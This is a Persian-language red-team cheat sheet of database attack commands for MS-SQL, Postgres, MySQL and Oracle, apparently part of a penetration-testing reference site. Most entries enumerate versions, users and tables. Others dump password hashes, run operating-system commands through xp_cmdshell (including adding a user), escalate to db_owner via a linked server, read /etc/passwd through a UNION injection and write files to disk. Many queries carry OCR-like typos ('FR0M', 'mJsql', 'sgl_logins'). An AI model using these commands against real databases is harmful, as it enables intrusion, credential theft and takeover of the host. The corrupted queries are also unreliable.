تیم قرمز

برگه رمز هایی برای نفوذگران

سرآغاز لینوکس ویندوز شبکه نکات و ترفند ها روش کار با ابزار ها وب پایگاه داده ها برنامه نویسی بی سیم مهندسی معکوس رمزنگاری پنهان نگاری ارزیابی اطلاعات(osint) منابع

پایگاه داده

Ms-sql

دستور توضیح
SELECT @@version نسخه پایگاه داده
EXEC xp_msver جزییات نسخه
EXEC master..xp_cmdshell 'net user' اجرا دستور سیستم عامل
SELECT HOST_ NAME() دریافت Hostname و IP
SELECT DB_ NAME() پایگاه داده فعلی
SELECT name FROM master..sysdatabases; لیست پایگاه داده ها
SELECT user name() کاربر فعلی
SELECT name FROM master .. sjslogins لیست کاربران

SELECT name FROM master..sysobjects WHERE

xtype= 'U';

لیست جدول ها

SELECT name FROM syscolumns WHERE id=(SELECT

id FR0M sysobjects WHERE name- 'mjtable' ) ;

لیست ستون ها

اطلاعات درباره تمام جدول های پایگاه داده در جدول سیستم

SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES

لیست جدول و ستون ها

SELECT name FROM Syscolumns WHERE id
(SELECT id FROM Sysobjects WHERE
name= 'mytable')

هش کلمه عبور

SELECT name, password hash FROM master.sys.sgl_logins

دور زدن سطح دسترسی کاربر

execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')

Postgres

دستور توضیح
SELECT version(); نسخه پایگاه داده
SELECT inet server_addr() دریافت Hostname و IP
SELECT current database(); پایگاه داده فعلی
SELECT datname FROM pg database; لیست پایگاه داده
SELECT user; کاربر جاری
SELECT username FROM pg_user; لیست کاربران
SELECT username,passwd FROM pg shadow لیست هش کلمه عبور

لیست ستون

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttjpid=T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

لیست جدول ها

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
( 'r',") AND n.nspname NOT IN ( 'pg catalog', 'pg toast') AND
pg_catalog.pg_table_is_visible(c.oid)

Mysql

دستور توضیح
SELECT @@version; نسخه پایگاه دااده
SELECT @@hostname; دریافت Hostname و IP
SELECT database(); پایگاه داده فعلی
SELECT distinct (db) FROM mysql.db; لیست پایگاه داده ها
SELECT user(); کاربر فعلی
SELECT user FROM mysql.user; لیست کاربران
SELECT host,user,password FROM mJsql.user; لیست هش کلمه عبور ها

لیست تمامی جداول و ستون ها

SELECT table schema, table name, column_ name FR0M
information scherna.columns WHERE
table schema != 'mysql' AND table schema != 'information schema'

اجرای دستور سیستم عامل در mysql

osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr`"

خواندن فایلی های خواندنی در mysql

UNION ALL SELECT LOAD FILE( '/etc/passwd');

نوشتن در فایل سیستم در mysql

SELECT * FROM mytable INTO dumpfile '/tmp/ somefile';

Oracle

دستور توضیح
SELECT * FROM v$version; نسخه پایگاه داده
SELECT version FROM v$instance; نسخه پایگاه داد
SELECT instance name FROM v$instance; پایگاه داده فعلی
SELECT name FROM v$database; پایگاه داده فعلی
SELECT DISTINCT owner FROM all_tables; لیست پایگاه داده ها
SELECT user FROM dual; کاربر فعلی

SELECT username FROM all_users ORDER BY

username;

لیست کابران
SELECT column name FROM all_tab_columns; لیست ستون ها
SELECT table name FROM all_tables; لیست جدول ها
SELECT name, password, astatus FROM sys.user$; لیست هش کلمه عبور ها

لیست پایگاه های داده

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';